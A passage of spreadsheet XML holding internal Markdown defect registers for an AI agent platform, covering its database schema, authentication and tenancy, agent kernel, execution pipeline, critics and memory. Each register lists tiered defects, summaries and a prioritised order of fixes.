    <t>03. Database &amp; Data Model — Defect Register</t>
  </si>
  <si>
    <t># 03. Database &amp; Data Model — Defect Register
&gt; **What this document is:** defects in the schema itself — missing migrations, missing
&gt; constraints, missing indexes, wrong column types — plus the improvements that would
&gt; make the database cheaper to query and safer to change.
&gt; **Source document:** [`03-data-model.md`](../03-data-model.md)
&gt; **Compiled:** 2026-09-01, against branch `fresh-main`.
&gt; **Context:** ~40 live tables, 52 Alembic revisions, one head. There are no paying
&gt; tenants, so a schema change today is far cheaper than the same change later.
---</t>
  </si>
  <si>
    <t>CTX-026</t>
  </si>
  <si>
    <t>## How to read this file
- **✅ Verified** — the model file, migration or SQL script was read on 2026-09-01.
- **📄 Doc-reported** — from `03-data-model.md`, not independently re-checked.
- Schema defects are different from code defects: most of them are invisible until the
  data grows or two writers collide. Severity here reflects **what happens when the
  platform gets busy**, not what happens today.
---</t>
  </si>
  <si>
    <t>CTX-027</t>
  </si>
  <si>
    <t>## Contents
1. [Summary](#1-summary)
2. [T0 — The database cannot be rebuilt correctly](#2-t0--the-database-cannot-be-rebuilt-correctly)
3. [T1 — Missing constraints and indexes](#3-t1--missing-constraints-and-indexes)
4. [T2 — Wrong types and dead tables](#4-t2--wrong-types-and-dead-tables)
5. [T3 — Traps that produce wrong answers](#5-t3--traps-that-produce-wrong-answers)
6. [Improvements](#6-improvements)
7. [Suggested order of work](#7-suggested-order-of-work)
---</t>
  </si>
  <si>
    <t>CTX-028</t>
  </si>
  <si>
    <t>## 1. Summary
| Tier | Theme | Count | When to do it |
|---|---|---|---|
| [T0](#2-t0--the-database-cannot-be-rebuilt-correctly) | The database cannot be rebuilt correctly | 3 | Now — a fresh deploy is broken today |
| [T1](#3-t1--missing-constraints-and-indexes) | Missing constraints and indexes | 6 | Before data volume grows |
| [T2](#4-t2--wrong-types-and-dead-tables) | Wrong types and dead tables | 6 | Opportunistically |
| [T3](#5-t3--traps-that-produce-wrong-answers) | Traps that produce wrong answers | 5 | Document now, fix when touched |
**Total: 20 defects, 10 improvements.**
The three worth reading first:
- **[DM-01](#dm-01--subscription_tiers-has-no-migration)** — a table the code depends on
  is created by no migration at all.
- **[DM-02](#dm-02--phone_numbers-is-created-by-a-script-not-a-migration)** — the same
  problem for the phone inventory.
- **[DM-04](#dm-04--billing_events-has-no-unique-constraint)** — the monthly billing
  table has no unique key, so every revenue report can over-count.</t>
  </si>
  <si>
    <t>CTX-029</t>
  </si>
  <si>
    <t>## 2. T0 — The database cannot be rebuilt correctly
A fresh database built with `alembic upgrade head` is **missing two tables the running
code needs**. This is the highest-value group in this file because it is invisible on
an existing database and fatal on a new one.</t>
  </si>
  <si>
    <t>CTX-030</t>
  </si>
  <si>
    <t>## 3. T1 — Missing constraints and indexes</t>
  </si>
  <si>
    <t>CTX-031</t>
  </si>
  <si>
    <t>## 4. T2 — Wrong types and dead tables
| ID | Problem | Why it matters | Status |
|---|---|---|---|</t>
  </si>
  <si>
    <t>CTX-032</t>
  </si>
  <si>
    <t>CTX-033</t>
  </si>
  <si>
    <t>## 5. T3 — Traps that produce wrong answers</t>
  </si>
  <si>
    <t>CTX-034</t>
  </si>
  <si>
    <t>CTX-035</t>
  </si>
  <si>
    <t>## 7. Suggested order of work
| Step | Work | Why here |
|---|---|---|
| **1** | DM-I1 — the four missing indexes | Minutes of work, immediate effect, zero risk |
| **2** | DM-01, DM-02 | A fresh database is broken today. These two migrations fix it |
| **3** | DM-04 | The unique constraint on `billing_events`, before any real revenue is reported |
| **4** | DM-11 / DM-I8, DM-13 / DM-I4 | Type migrations, cheapest while the tables are small |
| **5** | DM-09 / DM-I2, DM-I6 | Tenant columns on the log and memory tables |
| **6** | DM-16 | A default soft-delete filter, so the next forgotten `WHERE` is not a bug |
| **7** | DM-I3 | Decide the trace retention policy before the table forces the decision |
---</t>
  </si>
  <si>
    <t>CTX-036</t>
  </si>
  <si>
    <t>## Where to go next
- [03 — Data model](../03-data-model.md) — the source document.
- [`DEFECT-REGISTER.md`](../DEFECT-REGISTER.md) — DM-01 is D-06, DM-04 is D-07,
  DM-10 is D-28, DM-17 is D-35.
- [04 — Auth, RBAC &amp; tenancy](04-AUTH-RBAC-TENANCY-DEFECTS.md) — the enforcement side of
  DM-09 and DM-16.
- [14 — Billing &amp; credits](14-BILLING-AND-CREDITS-DEFECTS.md) — what DM-04 costs.
- [08 — Memory &amp; CORTEX](08-MEMORY-AND-CORTEX-DEFECTS.md) — for DM-07 and DM-I6.</t>
  </si>
  <si>
    <t>CTX-037</t>
  </si>
  <si>
    <t>04. Authentication, RBAC &amp; Multi-Tenancy — Defect Register</t>
  </si>
  <si>
    <t># 04. Authentication, RBAC &amp; Multi-Tenancy — Defect Register
&gt; **What this document is:** defects in who a request is, what it is allowed to do, and
&gt; whose data it can reach — plus the improvements that would make those three questions
&gt; answerable in one place instead of forty.
&gt; **Source document:** [`04-auth-rbac-tenancy.md`](../04-auth-rbac-tenancy.md)
&gt; **Compiled:** 2026-09-01, against branch `fresh-main`.
&gt; **Context:** this is the highest-severity register in the set. Two of the entries are
&gt; straightforward privilege escalation and one is an unauthenticated credential store.
---</t>
  </si>
  <si>
    <t>CTX-038</t>
  </si>
  <si>
    <t>## How to read this file
- **✅ Verified** — the code was read on 2026-09-01 and the claim held.
- **📄 Doc-reported** — from `04-auth-rbac-tenancy.md`, not independently re-checked.
- The tiers here are about **blast radius**, not effort. Several T0 items are one-line
  fixes.
- Tenant isolation on this platform is a convention, not a mechanism. There is no
  row-level security and no query filter. Every one of the ~40 tables is protected by a
  `WHERE company_id = ...` that a developer remembered to type. Read
  [§6 Improvements](#6-improvements) with that in mind — most of them are about making
  the boundary structural.
---</t>
  </si>
  <si>
    <t>CTX-039</t>
  </si>
  <si>
    <t>## Contents
1. [Summary](#1-summary)
2. [T0 — Privilege escalation and open doors](#2-t0--privilege-escalation-and-open-doors)
3. [T1 — Controls that are not enforced](#3-t1--controls-that-are-not-enforced)
4. [T2 — Missing pieces](#4-t2--missing-pieces)
5. [T3 — Inconsistency and dead weight](#5-t3--inconsistency-and-dead-weight)
6. [Improvements](#6-improvements)
7. [Suggested order of work](#7-suggested-order-of-work)
---</t>
  </si>
  <si>
    <t>CTX-040</t>
  </si>
  <si>
    <t>## 1. Summary
| Tier | Theme | Count | When to do it |
|---|---|---|---|
| [T0](#2-t0--privilege-escalation-and-open-doors) | Privilege escalation and open doors | 5 | **Now** — before any real customer data exists |
| [T1](#3-t1--controls-that-are-not-enforced) | Controls that are not enforced | 6 | Before relying on the control |
| [T2](#4-t2--missing-pieces) | Missing pieces | 5 | Before launch |
| [T3](#5-t3--inconsistency-and-dead-weight) | Inconsistency and dead weight | 6 | When the area is next touched |
**Total: 22 defects, 10 improvements.**
The three to read before anything else:
- **[AU-01](#au-01--any-admin-can-promote-themselves-to-app_admin)** — a `tenant_admin`
  can make themselves `app_admin` with one PATCH. That is full platform access.
- **[AU-02](#au-02--the-email-connection-api-has-no-authentication-at-all)** — five
  routes that create, read, delete and test **SMTP/IMAP credentials**, with no auth.
- **[AU-03](#au-03--any-user-can-suspend-their-own-company)** — a `tenant_user` can lock
  their whole company out of the platform, admins included.</t>
  </si>
  <si>
    <t>CTX-041</t>
  </si>
  <si>
    <t>## 2. T0 — Privilege escalation and open doors</t>
  </si>
  <si>
    <t>CTX-042</t>
  </si>
  <si>
    <t>current_user will be injected by auth middleware in production</t>
  </si>
  <si>
    <t># current_user will be injected by auth middleware in production
company_id: Optional[str] = None
```
There is no such middleware. `CompanySuspensionMiddleware` injects nothing and lets a
request with no `Authorization` header straight through.
- [`ai/email_router.py:88`](../../../backend/src/ai/email_router.py:88), [`:94`](../../../backend/src/ai/email_router.py:94), [`:159`](../../../backend/src/ai/email_router.py:159), [`:179`](../../../backend/src/ai/email_router.py:179), [`:204`](../../../backend/src/ai/email_router.py:204)
- [`ai/social_router.py`](../../../backend/src/ai/social_router.py) — the same feature, done correctly
- Also recorded as **D-04** in the platform register
**Fix:** add `get_current_user_and_company` and scope every query. Copy
`social_router.py`, never this file.
---</t>
  </si>
  <si>
    <t>CTX-043</t>
  </si>
  <si>
    <t>## 3. T1 — Controls that are not enforced</t>
  </si>
  <si>
    <t>CTX-044</t>
  </si>
  <si>
    <t>## 4. T2 — Missing pieces</t>
  </si>
  <si>
    <t>CTX-045</t>
  </si>
  <si>
    <t>## 5. T3 — Inconsistency and dead weight</t>
  </si>
  <si>
    <t>CTX-046</t>
  </si>
  <si>
    <t>CTX-047</t>
  </si>
  <si>
    <t>## 7. Suggested order of work
| Step | Work | Why here |
|---|---|---|
| **1** | AU-01, AU-03 | Two privilege-escalation holes, both a few lines. Nothing else on this list matters while they are open |
| **2** | AU-02 | Add auth to the email router. Copy `social_router.py` |
| **3** | AU-04, AU-14 | Two one-line checks in `_authenticate_user` |
| **4** | AU-I3 — `token_version` | One column that closes AU-05, AU-09, AU-12 and completes AU-04 |
| **5** | AU-06, AU-07 | Password reset and a server-side password policy. Needed before real users exist |
| **6** | AU-I2, AU-I5, AU-I4 | Consolidate the guards, the scoping helper, and delete the middleware |
| **7** | AU-I1 | The structural tenancy boundary. The largest piece of work here, and the one that stops this class of defect recurring |
| **8** | AU-I9 | The permission test suite, so step 7 stays correct |
---</t>
  </si>
  <si>
    <t>CTX-048</t>
  </si>
  <si>
    <t>## Where to go next
- [04 — Auth, RBAC &amp; tenancy](../04-auth-rbac-tenancy.md) — the source document,
  including the full permission matrix.
- [`DEFECT-REGISTER.md`](../DEFECT-REGISTER.md) — AU-02 is D-04.
- [03 — Data model](03-DATA-MODEL-DEFECTS.md) — DM-09 and DM-16 are the schema side of
  AU-I1.
- [02 — System architecture](02-SYSTEM-ARCHITECTURE-DEFECTS.md) — SA-20 for the shared
  secrets behind AU-11 and AU-13.
- [17 — API reference](17-API-REFERENCE-DEFECTS.md) — for the full list of routes and
  their guards.</t>
  </si>
  <si>
    <t>CTX-049</t>
  </si>
  <si>
    <t>05. The Agent Kernel — Defect Register</t>
  </si>
  <si>
    <t># 05. The Agent Kernel — Defect Register
&gt; **What this document is:** defects in the control loop itself — the perceive →
&gt; strategise → critique → act → observe → reflect → decide cycle in
&gt; `core/agent_loop.py` and the layers around it — plus the improvements that would make
&gt; a run cheaper and more honest about what it did.
&gt; **Source document:** [`05-agent-kernel.md`](../05-agent-kernel.md)
&gt; **Compiled:** 2026-09-01, against branch `fresh-main`.
&gt; **Context:** the kernel is the most expensive code in the platform. Every defect here
&gt; costs either money per run or truthfulness in what the run reports.
---</t>
  </si>
  <si>
    <t>CTX-050</t>
  </si>
  <si>
    <t>## How to read this file
- **✅ Verified** — the code was read on 2026-09-01 and the claim held.
- **📄 Doc-reported** — from `05-agent-kernel.md`, not independently re-checked.
- A recurring shape in this file: **a layer was built, wired in, and then bypassed.**
  `Perception`, `blockers`, `hypotheses`, the pre-critic and the child cap are all fully
  implemented and all effectively inert. Read
  [§1.1](#11-the-three-root-causes) before picking up individual items.
---</t>
  </si>
  <si>
    <t>CTX-051</t>
  </si>
  <si>
    <t>## Contents
1. [Summary](#1-summary)
2. [T0 — The run reports the wrong thing](#2-t0--the-run-reports-the-wrong-thing)
3. [T1 — Built, wired, and inert](#3-t1--built-wired-and-inert)
4. [T2 — Delete or fix the name](#4-t2--delete-or-fix-the-name)
5. [T3 — Correctness and cost](#5-t3--correctness-and-cost)
6. [Improvements](#6-improvements)
7. [Suggested order of work](#7-suggested-order-of-work)
---</t>
  </si>
  <si>
    <t>CTX-052</t>
  </si>
  <si>
    <t>## 1. Summary
| Tier | Theme | Count | When to do it |
|---|---|---|---|
| [T0](#2-t0--the-run-reports-the-wrong-thing) | The run reports the wrong thing | 3 | Before anyone bills or reports on runs |
| [T1](#3-t1--built-wired-and-inert) | Built, wired, and inert | 7 | Each one is a decision: finish it or delete it |
| [T2](#4-t2--delete-or-fix-the-name) | Delete or fix the name | 5 | **Now** — free |
| [T3](#5-t3--correctness-and-cost) | Correctness and cost | 6 | Needs design |
**Total: 21 defects, 10 improvements.**
The three to read first:
- **[AK-01](#ak-01--a-run-where-every-step-failed-can-report-completed)** — status is
  decided by "no steps left to run", not "the steps worked".
- **[AK-04](#ak-04--the-pre-critic-almost-never-runs)** — the safety gate in front of
  every action is skipped on the path that covers nearly all iterations.
- **[AK-11](#4-t2--delete-or-fix-the-name)** — two event names differ by one word between
  publisher and map, so the browser never gets replan or resume frames.</t>
  </si>
  <si>
    <t>CTX-053</t>
  </si>
  <si>
    <t>1.1 The three root causes</t>
  </si>
  <si>
    <t>### 1.1 The three root causes
Most of this file is a symptom of one of these. Fixing the three is a smaller job than
fixing the twenty-one.
| Cause | Description | Symptoms |
|---|---|---|
| **A** — The typed state was built but the dict bridge still drives everything | `AgentState` is the designed contract. In practice the per-step executors, the tool executor and the memory assembler all still take a plain `context_state: dict`, and the loop keeps both in sync by hand | AK-03, AK-05, AK-06, AK-16 |
| **B** — Layers were added without being made mandatory | The pre-critic, the child cap, the perceiver's rich fields and the executor flags were each added, then given a bypass so nothing broke on rollout. The bypass became the normal path | AK-04, AK-07, AK-08, AK-09 |
| **C** — Cost is tracked in three places and reconciled by `max()` | The loop's `Budget`, `run.total_cost_usd` written by nested step code, and `usage_logs` written by the critics. `_sync_budget_cost` pulls them together with `max()` at the end of each iteration, in an order that matters | AK-13, AK-14, AK-15 |
---</t>
  </si>
  <si>
    <t>CTX-054</t>
  </si>
  <si>
    <t>## 2. T0 — The run reports the wrong thing</t>
  </si>
  <si>
    <t>CTX-055</t>
  </si>
  <si>
    <t>## 3. T1 — Built, wired, and inert
Each of these reads as a working control. None of them is one. Every item is a decision:
**finish it or delete it** — but do not leave it looking functional.</t>
  </si>
  <si>
    <t>CTX-056</t>
  </si>
  <si>
    <t>## 4. T2 — Delete or fix the name
| ID | Problem | Notes | Status |
|---|---|---|---|</t>
  </si>
  <si>
    <t>CTX-057</t>
  </si>
  <si>
    <t>CTX-058</t>
  </si>
  <si>
    <t>## 5. T3 — Correctness and cost</t>
  </si>
  <si>
    <t>CTX-059</t>
  </si>
  <si>
    <t>CTX-060</t>
  </si>
  <si>
    <t>## 7. Suggested order of work
| Step | Work | Why here |
|---|---|---|
| **1** | AK-11, AK-14 | Two typos and a stale README. Minutes each, and AK-14 is actively misleading every new reader |
| **2** | AK-01 | The run status must tell the truth before anything else is measured from it |
| **3** | AK-10, AK-12, AK-09 | Delete the five dead flags, `can_afford`, and `hypotheses`. Free |
| **4** | AK-I6 / AK-03 | The stuck-run sweeper. One cron, closes a silent-loss path |
| **5** | AK-I1 / AK-02 | One cost write path. The largest correctness win in the kernel |
| **6** | AK-I2 | Decide the Perceiver's fate. Do not defer this again — it is carrying cost either way |
| **7** | AK-I4 / AK-07 | Enforce the child cap, with the dedicated queue |
| **8** | AK-I5 / AK-21 | Finish the typed-state migration and delete the dict bridge |
---</t>
  </si>
  <si>
    <t>CTX-061</t>
  </si>
  <si>
    <t>## Where to go next
- [05 — The agent kernel](../05-agent-kernel.md) — the source document.
- [`DEFECT-REGISTER.md`](../DEFECT-REGISTER.md) — AK-01 is D-34, AK-07 is D-13.
- [06 — Execution pipeline](06-EXECUTION-PIPELINE-DEFECTS.md) — what the executors call.
- [07 — Planning &amp; critics](07-PLANNING-AND-CRITICS-DEFECTS.md) — for AK-04, AK-13, AK-17.
- [08 — Memory &amp; CORTEX](08-MEMORY-AND-CORTEX-DEFECTS.md) — for AK-06 and AK-I2.
- [14 — Billing &amp; credits](14-BILLING-AND-CREDITS-DEFECTS.md) — for AK-02 and AK-I1.</t>
  </si>
  <si>
    <t>CTX-062</t>
  </si>
  <si>
    <t>06. Entities &amp; the Execution Pipeline — Defect Register</t>
  </si>
  <si>
    <t># 06. Entities &amp; the Execution Pipeline — Defect Register
&gt; **What this document is:** defects in how an entity is defined, dispatched, stepped and
&gt; finished — the nine JSON config blocks, the step engine, the DAG scheduler, child runs
&gt; and result handling — plus the improvements that would make a run cheaper and easier to
&gt; debug.
&gt; **Source document:** [`06-execution-pipeline.md`](../06-execution-pipeline.md)
&gt; **Compiled:** 2026-09-01, against branch `fresh-main`.
&gt; **Context:** the recurring theme here is **config that looks configurable and is not**.
&gt; A tenant admin fills in a field in the builder, saves it, and nothing reads it.
---</t>
  </si>
  <si>
    <t>CTX-063</t>
  </si>
  <si>
    <t>## How to read this file
- **✅ Verified** — the code was read on 2026-09-01 and the claim held.
- **📄 Doc-reported** — from `06-execution-pipeline.md`, not independently re-checked.
- The entity builder shows six tabs of settings. A meaningful fraction of those settings
  have **no runtime reader**. [§3](#3-t1--config-that-does-nothing) is a complete list of
  the ones found so far, and it is the most useful section in this file.
---</t>
  </si>
  <si>
    <t>CTX-064</t>
  </si>
  <si>
    <t>## Contents
1. [Summary](#1-summary)
2. [T0 — Tenant boundary and correctness](#2-t0--tenant-boundary-and-correctness)
3. [T1 — Config that does nothing](#3-t1--config-that-does-nothing)
4. [T2 — Dead columns and dead docs](#4-t2--dead-columns-and-dead-docs)
5. [T3 — Traps in the step engine](#5-t3--traps-in-the-step-engine)
6. [Improvements](#6-improvements)
7. [Suggested order of work](#7-suggested-order-of-work)
---</t>
  </si>
  <si>
    <t>CTX-065</t>
  </si>
  <si>
    <t>## 1. Summary
| Tier | Theme | Count | When to do it |
|---|---|---|---|
| [T0](#2-t0--tenant-boundary-and-correctness) | Tenant boundary and correctness | 4 | Before the first paying tenant |
| [T1](#3-t1--config-that-does-nothing) | Config that does nothing | 8 | Each is a decision: wire it or remove it from the UI |
| [T2](#4-t2--dead-columns-and-dead-docs) | Dead columns and dead docs | 5 | **Now** — free |
| [T3](#5-t3--traps-in-the-step-engine) | Traps in the step engine | 7 | When the area is next touched |
**Total: 24 defects, 10 improvements.**
The three to read first:
- **[EP-01](#ep-01--child-resolution-strategy-4-crosses-tenant-boundaries)** — a
  name-based lookup with no company filter can run another tenant's entity.
- **[EP-04](#ep-04--io_contractinput_schema-is-never-validated)** — the input contract the
  builder makes you define is never checked against the input.
- **[EP-05](#ep-05--eight-settings-in-the-builder-have-no-runtime-reader)** — the full
  list of controls that look real and are not.</t>
  </si>
  <si>
    <t>CTX-066</t>
  </si>
  <si>
    <t>## 2. T0 — Tenant boundary and correctness</t>
  </si>
  <si>
    <t>CTX-067</t>
  </si>
  <si>
    <t>## 3. T1 — Config that does nothing
Every item here is authored in the entity builder, saved to the database, shown back to
the user, and read by no runtime code. This is the section to act on first, because each
one is a promise the product is currently breaking.</t>
  </si>
  <si>
    <t>CTX-068</t>
  </si>
  <si>
    <t>## 4. T2 — Dead columns and dead docs
| ID | Delete or fix | Notes | Status |
|---|---|---|---|</t>
  </si>
  <si>
    <t>CTX-069</t>
  </si>
  <si>
    <t>CTX-070</t>
  </si>
  <si>
    <t>## 5. T3 — Traps in the step engine</t>
  </si>
  <si>
    <t>CTX-071</t>
  </si>
  <si>
    <t>CTX-072</t>
  </si>
  <si>
    <t>## 7. Suggested order of work
| Step | Work | Why here |
|---|---|---|
| **1** | EP-01 | One line, closes a cross-tenant execution path |
| **2** | EP-I1 / EP-04 | Input validation at dispatch. Cheapest way to stop wasted runs |
| **3** | EP-I3 / EP-18 | Store outputs once. Immediate reduction in context size everywhere |
| **4** | EP-I2 / EP-05 | The dead-config sweep. Do it as one piece of work, not eight |
| **5** | EP-I7 / EP-03 | Split `parent_run_id`. Fixes retry billing at the same time |
| **6** | EP-I5 / EP-21, EP-I6 | Artifacts by `run_id`, unique step names |
| **7** | EP-I8 / EP-22 | One healing ladder, flag deleted |
| **8** | EP-I4 / EP-10 | Version pinning. The largest piece, and what makes runs reproducible |
---</t>
  </si>
  <si>
    <t>CTX-073</t>
  </si>
  <si>
    <t>## Where to go next
- [06 — Execution pipeline](../06-execution-pipeline.md) — the source document.
- [`DEFECT-REGISTER.md`](../DEFECT-REGISTER.md) — EP-01 is D-33.
- [05 — Agent kernel](05-AGENT-KERNEL-DEFECTS.md) — the loop that drives these steps.
- [`TOOL-LAYER-DEFECTS.md`](TOOL-LAYER-DEFECTS.md) — for EP-02, EP-07, EP-08 in depth.
- [07 — Planning &amp; critics](07-PLANNING-AND-CRITICS-DEFECTS.md) — for the retry strategy
  behind EP-05.
- [03 — Data model](03-DATA-MODEL-DEFECTS.md) — for the dead columns in T2.</t>
  </si>
  <si>
    <t>CTX-074</t>
  </si>
  <si>
    <t>07. Planning, Critics &amp; Self-Correction — Defect Register</t>
  </si>
  <si>
    <t># 07. Planning, Critics &amp; Self-Correction — Defect Register
&gt; **What this document is:** defects in how the platform makes a plan, checks its own
&gt; work, and recovers from failure — plus the improvements that would make criticism
&gt; cheaper and self-correction actually correct something.
&gt; **Source document:** [`07-planning-and-critics.md`](../07-planning-and-critics.md)
&gt; **Compiled:** 2026-09-01, against branch `fresh-main`.
&gt; **Context:** this subsystem spends real money on every iteration. Several of the
&gt; defects below mean the platform is **paying for a critic whose verdict is thrown
&gt; away**.
---</t>
  </si>
  <si>
    <t>CTX-075</t>
  </si>
  <si>
    <t>## How to read this file
- **✅ Verified** — the code was read on 2026-09-01 and the claim held.
- **📄 Doc-reported** — from `07-planning-and-critics.md`, not independently re-checked.
- The pattern to hold in mind: four critic stages exist, three of them produce a verdict
  the loop does not act on, and all four are billed. That is the shape of most of
  [§2](#2-t0--paying-for-criticism-that-is-discarded).
---</t>
  </si>
  <si>
    <t>CTX-076</t>
  </si>
  <si>
    <t>## Contents
1. [Summary](#1-summary)
2. [T0 — Paying for criticism that is discarded](#2-t0--paying-for-criticism-that-is-discarded)
3. [T1 — Self-correction that does not correct](#3-t1--self-correction-that-does-not-correct)
4. [T2 — Built and never wired](#4-t2--built-and-never-wired)
5. [T3 — Planning correctness](#5-t3--planning-correctness)
6. [Improvements](#6-improvements)
7. [Suggested order of work](#7-suggested-order-of-work)
---</t>
  </si>
  <si>
    <t>CTX-077</t>
  </si>
  <si>
    <t>## 1. Summary
| Tier | Theme | Count | When to do it |
|---|---|---|---|
| [T0](#2-t0--paying-for-criticism-that-is-discarded) | Paying for criticism that is discarded | 5 | Now — this is money per run |
| [T1](#3-t1--self-correction-that-does-not-correct) | Self-correction that does not correct | 5 | Before claiming the platform self-corrects |
| [T2](#4-t2--built-and-never-wired) | Built and never wired | 5 | Each is a decision: wire it or delete it |
| [T3](#5-t3--planning-correctness) | Planning correctness | 7 | When the area is next touched |
**Total: 22 defects, 10 improvements.**
The three to read first:
- **[PC-01](#pc-01--the-pre-critic-is-skipped-on-almost-every-iteration)** — the gate in
  front of every action passes automatically on the normal path.
- **[PC-06](#pc-06--every-retry-strategy-executes-identically)** — seven retry
  strategies are chosen, logged, and then all executed the same way.
- **[PC-03](#pc-03--alignment-drift-is-measured-and-discarded)** — goal drift is
  detected, a correction hint is written, and the loop drops it.</t>
  </si>
  <si>
    <t>CTX-078</t>
  </si>
  <si>
    <t>## 2. T0 — Paying for criticism that is discarded</t>
  </si>
  <si>
    <t>CTX-079</t>
  </si>
  <si>
    <t>## 3. T1 — Self-correction that does not correct</t>
  </si>
  <si>
    <t>CTX-080</t>
  </si>
  <si>
    <t>## 4. T2 — Built and never wired
Everything here is complete: the code, the maths, the migration and the tests. What is
missing is a production call site.
| ID | Component | State | Status |
|---|---|---|---|</t>
  </si>
  <si>
    <t>CTX-081</t>
  </si>
  <si>
    <t>CTX-082</t>
  </si>
  <si>
    <t>## 5. T3 — Planning correctness</t>
  </si>
  <si>
    <t>CTX-083</t>
  </si>
  <si>
    <t>CTX-084</t>
  </si>
  <si>
    <t>## 7. Suggested order of work
| Step | Work | Why here |
|---|---|---|
| **1** | PC-I1 / PC-06 | Retries that actually differ. All the hard work is already done |
| **2** | PC-18 | The placeholder break — a silent data-flow bug on the dynamic path |
| **3** | PC-I4 / PC-04, PC-I6 / PC-14 | Two one-argument fixes: read intelligence rules, emit planning events |
| **4** | PC-I2 / PC-03, PC-I3 / PC-05, PC-16 | Make the alignment stage earn its cost, and make the critic budget real |
| **5** | PC-01 | Fix the pre-critic bypass properly, by making a `BLOCK` change the move |
| **6** | PC-I8 / PC-11, PC-12, PC-13 | Decide on the unwired components. Wire or delete, no third option |
| **7** | PC-I7 | Plan caching — the biggest cost reduction available in this subsystem |
---</t>
  </si>
  <si>
    <t>CTX-085</t>
  </si>
  <si>
    <t>## Where to go next
- [07 — Planning, critics &amp; self-correction](../07-planning-and-critics.md) — the source
  document.
- [05 — Agent kernel](05-AGENT-KERNEL-DEFECTS.md) — AK-04 and AK-17 are the loop-side view
  of PC-01 and PC-09.
- [06 — Execution pipeline](06-EXECUTION-PIPELINE-DEFECTS.md) — EP-05 for the dead retry
  policy behind PC-07.
- [08 — Memory &amp; CORTEX](08-MEMORY-AND-CORTEX-DEFECTS.md) — where PC-11's trust scores
  would be consumed.
- [11 — Meta-intelligence](11-META-INTELLIGENCE-DEFECTS.md) — the IntelligenceTree that
  PC-04 does not read.</t>
  </si>
  <si>
    <t>CTX-086</t>
  </si>
  <si>
    <t>08. Memory, CORTEX &amp; Retrieval — Defect Register</t>
  </si>
  <si>
    <t># 08. Memory, CORTEX &amp; Retrieval — Defect Register
&gt; **What this document is:** defects in what an agent remembers and how that memory comes
&gt; back — the CORTEX trees, the four memory domains, embeddings, RAG and the dreaming
&gt; pipeline — plus the improvements that would make memory pay for itself.
&gt; **Source document:** [`08-memory-and-cortex.md`](../08-memory-and-cortex.md)
&gt; **Compiled:** 2026-09-01, against branch `fresh-main`.
&gt; **Context:** the headline finding is
&gt; [MC-01](#mc-01--cortex-is-write-only-on-the-live-path). Read it first. Almost
&gt; everything else in this file is a consequence of it or is currently harmless because
&gt; of it.
---</t>
  </si>
  <si>
    <t>CTX-087</t>
  </si>
  <si>
    <t>## How to read this file
- **✅ Verified** — the code was read on 2026-09-01 and the claim held.
- **📄 Doc-reported** — from `08-memory-and-cortex.md`, not independently re-checked.
- Much of `src/ai/memory/` is a thin re-export shim. The real implementation lives in
  `backend/cortex_memory_moved_to_pypi_repo/`, installed as the `hb-cortex-memory`
  package. If a file is under ~100 lines and says "host re-export shim", read there.
---</t>
  </si>
  <si>
    <t>CTX-088</t>
  </si>
  <si>
    <t>## Contents
1. [Summary](#1-summary)
2. [T0 — Memory that is written and never read](#2-t0--memory-that-is-written-and-never-read)
3. [T1 — Silent failure and silent no-ops](#3-t1--silent-failure-and-silent-no-ops)
4. [T2 — Structural gaps](#4-t2--structural-gaps)
5. [T3 — Inconsistency and cost](#5-t3--inconsistency-and-cost)
6. [Improvements](#6-improvements)
7. [Suggested order of work](#7-suggested-order-of-work)
---</t>
  </si>
  <si>
    <t>CTX-089</t>
  </si>
  <si>
    <t>## 1. Summary
| Tier | Theme | Count | When to do it |
|---|---|---|---|
| [T0](#2-t0--memory-that-is-written-and-never-read) | Memory that is written and never read | 4 | **Now** — this is the whole subsystem's value |
| [T1](#3-t1--silent-failure-and-silent-no-ops) | Silent failure and silent no-ops | 5 | Before trusting any memory behaviour |
| [T2](#4-t2--structural-gaps) | Structural gaps | 5 | Before data volume grows |
| [T3](#5-t3--inconsistency-and-cost) | Inconsistency and cost | 6 | When the area is next touched |
**Total: 20 defects, 10 improvements.**
The three to read first:
- **[MC-01](#mc-01--cortex-is-write-only-on-the-live-path)** — every step, tool result
  and reflection is written into CORTEX. **Nothing reads any of it back into a prompt.**
- **[MC-02](#mc-02--the-scheduled-dreaming-job-has-never-run)** — the cron that distils
  memory into rules enqueues a job name the worker cannot execute.
- **[MC-06](#mc-06--every-retrieval-failure-is-silent)** — broken memory and empty memory
  look identical, by design.</t>
  </si>
  <si>
    <t>CTX-090</t>
  </si>
  <si>
    <t>## 2. T0 — Memory that is written and never read</t>
  </si>
  <si>
    <t>CTX-091</t>
  </si>
  <si>
    <t>## 3. T1 — Silent failure and silent no-ops</t>
  </si>
  <si>
    <t>CTX-092</t>
  </si>
  <si>
    <t>## 4. T2 — Structural gaps</t>
  </si>
  <si>
    <t>CTX-093</t>
  </si>
  <si>
    <t>## 5. T3 — Inconsistency and cost</t>
  </si>
  <si>
    <t>CTX-094</t>
  </si>
  <si>
    <t>CTX-095</t>
  </si>
  <si>
    <t>## 7. Suggested order of work
| Step | Work | Why here |
|---|---|---|
| **1** | MC-I1 / MC-01 | Wire the read path. Nothing else in this file matters first |
| **2** | MC-I2 / MC-06 | Make failures loud, so step 1 stays working |
| **3** | MC-15, MC-16 | Fix the viewport budget and the write invariant — both become live the moment MC-01 lands |
| **4** | MC-I3 / MC-02 | Register the two jobs. Dreaming output now has a consumer |
| **5** | MC-I6 / MC-11, MC-13 | Startup validation for the embedding dimension and the index |
| **6** | MC-I5 / MC-14, MC-I7 / MC-12, MC-18 | Consolidate to one chunker and one RAG path |
| **7** | MC-I4 / MC-10 | Retention and deletion. Decide the policy before the tables are large |
| **8** | MC-I8, MC-I9 | Cache the memory block, then measure whether it helps |
---</t>
  </si>
  <si>
    <t>CTX-096</t>
  </si>
  <si>
    <t>## Where to go next
- [08 — Memory, CORTEX &amp; retrieval](../08-memory-and-cortex.md) — the source document.
- [05 — Agent kernel](05-AGENT-KERNEL-DEFECTS.md) — AK-05 and AK-06 are the loop-side view
  of MC-01.
- [07 — Planning &amp; critics](07-PLANNING-AND-CRITICS-DEFECTS.md) — PC-04 and PC-11 are the
  critic-side view of MC-03.
- [02 — System architecture](02-SYSTEM-ARCHITECTURE-DEFECTS.md) — SA-06 for the unregistered
  worker jobs.
- [03 — Data model](03-DATA-MODEL-DEFECTS.md) — DM-07 and DM-I6 for the vector tables.</t>
  </si>
  <si>
    <t>CTX-097</t>
  </si>
  <si>
    <t>09. Tools &amp; the Tool Registry — Defect Register</t>
  </si>
  <si>
    <t># 09. Tools &amp; the Tool Registry — Defect Register
&gt; **What this document is:** the tool-layer register at the level of
